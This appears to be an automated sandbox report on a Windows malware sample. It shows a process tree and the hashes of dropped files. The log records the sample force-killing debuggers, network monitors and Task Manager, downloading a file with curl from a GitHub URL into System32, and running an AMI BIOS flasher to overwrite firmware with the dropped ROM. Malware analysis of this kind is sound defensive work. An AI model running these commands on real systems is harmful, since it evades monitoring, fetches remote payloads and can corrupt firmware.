- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:4860
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    PID:4124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:4460
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    PID:4792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:2592
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    PID:1260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:4432
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    PID:928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:1376
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    PID:4444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:4088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    PID:4256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:1684
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:1160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:3512
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    PID:372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:324
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    PID:2624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:4332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    - Kills process with taskkill
    PID:4076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:4108
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:3704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:4524
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    PID:2036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:1536
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:3444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:1892
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Kills process with taskkill
    PID:664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:880
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:1656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:3476
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    - Kills process with taskkill
    PID:2424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:724
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    - Kills process with taskkill
    PID:3780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:760
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:5016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1708
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    PID:1532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1976
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:4808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:4976
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    - Kills process with taskkill
    PID:4560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:3216
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:4092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:3088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:4264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:2220
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:5040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:4548
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    PID:4732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:5024
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:3244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2096
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:1244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4972
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:4228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:4960
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    - Kills process with taskkill
    PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:2024
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:4000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2508
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:4124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4508
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    PID:3684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:3040
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    - Kills process with taskkill
    PID:1260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:2348
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    PID:928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:1560
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    PID:4444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:4312
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    - Kills process with taskkill
    PID:4088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent -o C:\Windows\System32\Tasks\Mac.bat -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36" https://github.com/zer0gra/perm-files/raw/main/BIOS.rom
  2⤵
  PID:264
- - C:\Windows\system32\curl.exe
    curl --silent -o C:\Windows\System32\Tasks\Mac.bat -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36" https://github.com/zer0gra/perm-files/raw/main/BIOS.rom
    3⤵
    - Drops file in System32 directory
    PID:320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:184
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    PID:2584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:2028
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    - Kills process with taskkill
    PID:216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:3760
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    PID:3188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:532
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    PID:956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:1108
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    - Kills process with taskkill
    PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:2032
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    PID:564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:4788
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    PID:856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:3936
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Kills process with taskkill
    PID:1856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:3476
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    PID:3020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /o
  2⤵
  PID:2992
- - C:\Windows\System32\AFUWINx64.EXE
    C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /o
    3⤵
    - Executes dropped EXE
    PID:2368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:1268
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    PID:4820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /p
  2⤵
  PID:1396
- - C:\Windows\System32\AFUWINx64.EXE
    C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /p
    3⤵
    - Executes dropped EXE
    PID:1224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:380
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    - Kills process with taskkill
    PID:3492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:4560
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Kills process with taskkill
    PID:4976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:4092
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    PID:3216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:1848
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:4620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:208
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Kills process with taskkill
    PID:2120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:3596
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Kills process with taskkill
    PID:5040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:4780
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    PID:4732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:996
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    PID:3244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1432
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:1244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3604
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:4228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4532
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:1492
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:2224
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:3236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:2080
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:4460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:4508
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Kills process with taskkill
    PID:3784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:2064
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    PID:2348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4728
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4952
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:3332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2584
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:2072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:1288
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    PID:2076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:3000
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:3760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1248
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    PID:3404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4364
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:4424
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    PID:664
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3496 -s 292
  2⤵
  PID:1856

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\System32\AFUWINx64.EXE

Filesize
1.1MB

MD5
9d0daba81cee203b0d39377baef9f4cb

SHA1
ed37746cbb5ed85c54aa90c3598b7069c194bad9

SHA256
1f12e8352afbb111918f2a3e7cdad8202ea4f55e691f1de55ac0bd58f2f96460

SHA512
cb29f7c6a71efa33652298f35cc878427806e2452a65c70079bf5f9fded7fb90500d9e73c96c85a2fdfa85587b7a7c365c7464e0e7b90832da6bfec3926f51cb

Download Submit
C:\Windows\System32\AMIDEWINx64.EXE

Filesize
455KB

MD5
9adfcdac59db3286690c7eede8da2528

SHA1
0b54d251438a634bd13b49a1f20587cf03d4598d

SHA256
13037eedd91f9313ec0d807947db65c639642e5ae6497e87d12fa6d19951f78e

SHA512
fde1700cdb4212593ec2733944a169c7d02f436ca6831719a33482fbfd0be289697c9aa6ce7ddfb6c245e87952b35416929bbf69753d21a24197ac6c2d1243cc

Download Submit
C:\Windows\System32\amifldrv64.sys

Filesize
29KB

MD5
f22740ba54a400fd2be7690bb204aa08

SHA1
5812387783d61c6ab5702213bb968590a18065e3

SHA256
65c26276cadda7a36f8977d1d01120edb5c3418be2317d501761092d5f9916c9

SHA512
ac1f89736cf348f634b526569b5783118a1a35324f9ce2f2804001e5a04751f8cc21d09bfa1c4803cd14a64152beba868f5ecf119f10fa3ccbe680d2fb481500

Download Submit